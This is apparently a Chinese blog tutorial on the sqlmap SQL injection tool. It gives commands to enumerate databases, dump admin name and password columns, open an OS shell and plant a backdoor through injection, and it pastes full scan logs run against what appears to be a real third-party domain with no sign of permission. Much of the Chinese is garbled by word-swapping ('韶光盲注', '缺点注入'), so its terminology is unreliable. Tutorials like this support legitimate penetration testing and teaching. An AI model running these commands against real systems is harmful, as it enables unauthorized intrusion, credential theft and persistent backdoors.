大家好,本日为大家分享一个无敌的 Python 库 - sqlmap。
Github地址:https://github.com/sqlmapproject/sqlmap
在网络安全领域,SQL注入仍旧是最常见的攻击之一。sqlmap是一个开源的自动化SQL注入和数据库取证工具,它供应了广泛的功能来检测和利用SQL注入漏洞。本文将详细先容sqlmap的安装、特性、基本与高等功能,并结合实际运用处景,展示其在网络安全测试中的运用。
sqlmap是用Python编写的,可以通过克隆其GitHub仓库或利用pip安装:
pip install sqlmap
或者:
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-devcd sqlmap-dev
安装简便,使得用户可以快速开始他们的SQL注入测试事情。
特性支持广泛的数据库系统:如MySQL, Oracle, PostgreSQL等。自动检测注入点:自动化的办法检测SQL注入漏洞。多种SQL注入技能:包括布尔盲注、韶光盲注、缺点注入等。丰富的数据获取功能:能够获取数据库名称、表、列和对应数据。基本功能自动检测注入点
sqlmap能够自动识别SQL注入漏洞,这是其最基本的功能之一。用户只需供应一个可疑的URL,sqlmap便可以进行剖析。
python sqlmap.py -u "https://mcs.zijieapi.com/list" --batch
这个命令会自动测试URL中的参数id是否存在SQL注入漏洞。--batch参数用于自动化模式,避免在过程中进行交互。
输出结果:
___ __H__ ___ ___[)]_____ ___ ___ {1.8.5.4#dev}|_ -| . ['] | .'| . ||___|_ [,]_|_|_|__,| _| |_|V... |_| https://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[] starting @ 10:29:48 /2024-05-13/[10:29:48] [WARNING] you've provided target URL without any GET parameters (e.g. 'http://www.site.com/article.php?id=1') and without providing any POST parameters through option '--data'do you want to try URI injections in the target URL itself? [Y/n/q] Y[10:29:48] [INFO] testing connection to the target URL[10:29:49] [INFO] checking if the target is protected by some kind of WAF/IPS[10:29:49] [INFO] testing if the target URL content is stable[10:29:49] [INFO] target URL content is stable[10:29:49] [INFO] testing if URI parameter '#1' is dynamic[10:29:49] [INFO] heuristics detected web page charset 'utf-8'[10:29:49] [WARNING] URI parameter '#1' does not appear to be dynamic[10:29:50] [WARNING] heuristic (basic) test shows that URI parameter '#1' might not be injectable[10:29:50] [INFO] testing for SQL injection on URI parameter '#1'[10:29:50] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'[10:29:52] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'[10:29:52] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'[10:29:53] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'[10:29:54] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'[10:29:55] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'[10:29:56] [INFO] testing 'Generic inline queries'[10:29:56] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'[10:29:57] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'[10:29:58] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'[10:29:59] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'[10:30:00] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'[10:30:01] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'[10:30:02] [INFO] testing 'Oracle AND time-based blind'it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] Y[10:30:03] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'[10:30:04] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test[10:30:05] [INFO] target URL appears to have 1 column in query[10:30:05] [WARNING] applying generic concatenation (CONCAT)[10:30:05] [WARNING] if UNION based SQL injection is not detected, please consider and/or try to force the back-end DBMS (e.g. '--dbms=mysql') [10:30:07] [WARNING] URI parameter '#1' does not seem to be injectable[10:30:07] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'[10:30:07] [WARNING] HTTP error codes detected during run:444 (?) - 88 times, 404 (Not Found) - 5 times[] ending @ 10:30:07 /2024-05-13/
获取数据库信息
一旦检测到SQL注入漏洞,sqlmap可以被用来获取数据库的详细信息,如数据库类型、版本和构造。
python sqlmap.py -u "https://mcs.zijieapi.com/list" --batch --banner
这个命令会输出数据库的版本和其他信息(如MySQL、Oracle、PostgreSQL的版本号)。
输出结果:
___ __H__ ___ ___[(]_____ ___ ___ {1.8.5.4#dev}|_ -| . [)] | .'| . ||___|_ [)]_|_|_|__,| _| |_|V... |_| https://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[] starting @ 10:31:28 /2024-05-13/[10:31:28] [WARNING] you've provided target URL without any GET parameters (e.g. 'http://www.site.com/article.php?id=1') and without providing any POST parameters through option '--data'do you want to try URI injections in the target URL itself? [Y/n/q] Y[10:31:28] [INFO] testing connection to the target URL[10:31:28] [INFO] testing if the target URL content is stable[10:31:29] [INFO] target URL content is stable[10:31:29] [INFO] testing if URI parameter '#1' is dynamic[10:31:29] [INFO] heuristics detected web page charset 'utf-8'[10:31:29] [WARNING] URI parameter '#1' does not appear to be dynamic[10:31:29] [WARNING] heuristic (basic) test shows that URI parameter '#1' might not be injectable[10:31:29] [INFO] testing for SQL injection on URI parameter '#1'[10:31:29] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'[10:31:31] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'[10:31:32] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'[10:31:33] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'[10:31:34] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'[10:31:35] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'[10:31:36] [INFO] testing 'Generic inline queries'[10:31:36] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'[10:31:37] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'[10:31:37] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'[10:31:38] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'[10:31:39] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'[10:31:40] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'[10:31:41] [INFO] testing 'Oracle AND time-based blind'it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] Y[10:31:42] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'[10:31:43] [WARNING] URI parameter '#1' does not seem to be injectable[10:31:43] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'[10:31:43] [WARNING] HTTP error codes detected during run:444 (?) - 71 times, 404 (Not Found) - 3 times[] ending @ 10:31:43 /2024-05-13/
提取数据库数据
sqlmap可以用来提取数据库中的数据,包括表名、列名及详细数据。
sqlmap -u "http://example.com/page.php?id=1" --batch --dbs
这个命令会列出所有可访问的数据库。
sqlmap -u "http://example.com/page.php?id=1" --batch -D dbname --tables
这个命令会列出指天命据库dbname中的所有表。
sqlmap -u "http://example.com/page.php?id=1" --batch -D dbname -T tablename --columns
这个命令会列出指定表tablename中的所有列。
sqlmap -u "http://example.com/page.php?id=1" --batch -D dbname -T tablename -C column1,column2 --dump
这个命令会提取并显示指定表中指定列column1和column2的数据。
高等功能操作系统级访问
sqlmap可以利用SQL注入漏洞获取操作系统级别的访问权限。这包括获取shell访问权限,乃至是完备掌握受影响的做事器。
sqlmap -u "http://example.com/page.php?id=1" --os-shell
这个命令考试测验通过SQL注入漏洞获取一个操作系统的shell。它将利用数据库做事器的漏洞来实行操作系统命令。
数据库后门植入
sqlmap能够自动植入数据库后门,方便未来的访问。这是一种高等技能,常日用于渗透测试中。
sqlmap -u "http://example.com/page.php?id=1" --os-pwn
这个命令会考试测验利用SQL注入漏洞在目标数据库做事器上植入一个后门,这常日涉及到二进制文件的上传和实行。
韶光盲注技能
韶光盲注是一种在相应韶光上操作的技能,sqlmap供应了自动化这一技能的功能。
sqlmap -u "http://example.com/page.php?id=1" --technique=T
这个命令指定利用韶光盲注技能进行测试。--technique参数可以用来指定利用哪种类型的SQL注入技能(B: Boolean-based blind, T: Time-based blind, E: Error-based, U: UNION query-based, S: Stacked queries)。
自定义注入点和数据提取
sqlmap许可用户定义详细的注入点,乃至自定义SQL查询来提取数据。
sqlmap -u "http://example.com/page.php?id=1" --dbms=MySQL --dump -T users -C name,password --where="role='admin'"
这个命令指定从users表中提取name和password列,但仅限于那些role列为admin的行。
实际运用处景网络安全审计
在网络安全审计中,sqlmap可以用来识别和报告Web运用中的SQL注入漏洞,帮助企业理解和修复潜在的安全风险。
sqlmap -u "http://example.com/page.php?id=1" --risk=3 --level=5 --batch
这个命令配置sqlmap进行深入的安全测试,--risk 和 --level 参数提高测试的深度和广度,--batch用于自动处理提示信息。
渗透测试
在渗透测试中,测试者利用sqlmap来验证疑似的安全漏洞,并评估攻击者可能利用这些漏洞造成的危害。
sqlmap -u "http://example.com/page.php?id=1" --dbs --technique=U
这个命令用于探测所有可访问的数据库,并且指定利用UNION查询技能,这是一种常用的SQL注入方法。
安全教诲和培训
sqlmap也广泛用于教诲和培训场景,帮助学习者理解SQL注入的事理和防护方法。
sqlmap -u "http://example.com/page.php?id=1" --banner
这个大略的命令可以用来向学习者展示如何通过sqlmap获取数据库做事器的版本信息,作为入门级的演示。
自动化脚本
利用sqlmap的API,开拓者可以编写自动化脚本来集成更繁芜的安全测试事情流程。
import oscommand = "sqlmap -u 'http://example.com/page.php?id=1' --batch --beep"os.system(command)
这个Python脚本利用sqlmap进行自动化测试,并在创造漏洞时发出警报。
总结sqlmap是一个强大的自动化SQL注入工具,专为检测、利用和管理数据库的SQL注入漏洞设计。它支持广泛的数据库系统,能自动识别注入点,并通过多种技能实行详尽的数据库、表、数据提取。sqlmap的功能包括获取数据库版本信息、数据提取、访问底层文件系统和实行远程命令,乃至许可植入后门。该工具不仅适用于网络安全专家进行安全审计和渗透测试,也广泛用于安全教诲和培训,帮助理解和戒备SQL注入攻击。通过其命令行界面和API,sqlmap为自动化测试供应了极大的便利,是网络安全领域中不可或缺的工具。
